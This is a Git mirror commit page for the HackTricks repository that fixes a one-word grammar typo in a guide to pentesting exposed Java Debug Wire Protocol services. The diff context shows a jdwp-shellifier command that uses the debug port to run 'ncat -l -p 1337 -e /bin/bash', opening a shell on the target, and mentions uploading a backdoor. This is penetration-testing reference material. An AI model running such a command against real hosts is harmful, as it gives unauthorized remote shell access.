Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-22 04:33:28 +00:00
Code Issues Projects Releases Packages Wiki Activity

Fix typo pentesting-jdwp-java-debug-wire-protocol.md

Browse source
This commit is contained in:
JohLud 2024-11-02 03:01:58 +01:00 committed by GitHub
parent aab45ae388
commit 9f4b5f8260
No known key found for this signature in database
GPG key ID: B5690EEEBB952194
1 changed files with 1 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

2
network-services-pentesting/pentesting-jdwp-java-debug-wire-protocol.md
View file

@ -35,7 +35,7 @@ The go-to tool is [jdwp-shellifier](https://github.com/hugsy/jdwp-shellifier). Y
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --break-on 'java.lang.String.indexOf' --cmd 'ncat -l -p 1337 -e /bin/bash' #Uses java.lang.String.indexOf as breakpoint instead of java.net.ServerSocket.accept
```
I found that the use of `--break-on 'java.lang.String.indexOf'` make the exploit more **stable**. And if you have the chance to upload a backdoor to the host and execute it instead of executing a command, the exploit will be even more stable.
I found that the use of `--break-on 'java.lang.String.indexOf'` makes the exploit more **stable**. And if you have the chance to upload a backdoor to the host and execute it instead of executing a command, the exploit will be even more stable.
## More details